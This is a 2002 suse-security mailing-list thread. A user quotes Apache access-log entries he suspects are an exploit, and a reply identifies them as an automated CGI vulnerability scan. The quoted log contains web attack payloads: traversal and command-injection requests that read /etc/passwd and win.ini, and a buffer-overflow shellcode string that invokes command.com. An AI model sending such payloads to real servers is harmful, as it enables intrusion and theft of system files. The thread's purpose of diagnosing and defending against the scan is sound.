This is a webscan, or a cgi scan, or We can tell, a Script Kiddies
Attempt.
Sorry me poor English, Best
Regards ,
"Quem nunca pirateou que atire o 1º disco,
que eu atiro uma cópia"
===================
Sp0oKeR - NsC
Analista Linux / Security
spooker@bol.com.br
====================
----- Original Message -----
From: Charles Funderburk
To:
Sent: Wednesday, July 10, 2002 3:04 PM
Subject: [suse-security] Possible Apache Exploit?
Quer ter seu próprio endereço na Internet?
Garanta já o seu e ainda ganhe cinco e-mails personalizados.
DomíniosBOL - http://dominios.bol.com.br
Hello all,
I am new to the list and have gained a ton from reading all the comments and
suggestions. I thought someone might be able to help me out and give me
their
two cents on something I noticed in my Apache access logs.Looks like a
buffer
overflow intended for a NT machine.
0.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI"
404
-
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+
-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t
`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_
/c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET file://etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
/cgi-bin/faxsurvey?cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo"
404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI"
404
-
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&d
sn=NA
I+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404
299
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404
283
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa
HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET
/mlog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET
/php/mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST
/cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304
I haven't seen any of the code for the latest apache chunk exploit. Anyone
have any ideas or suggestions?
Thanks!
-Charles
--
To unsubscribe, e-mail: suse-security-unsubscribe@suse.com
For additional commands, e-mail: suse-security-help@suse.com
Security-related bug reports go to security@suse.de, not here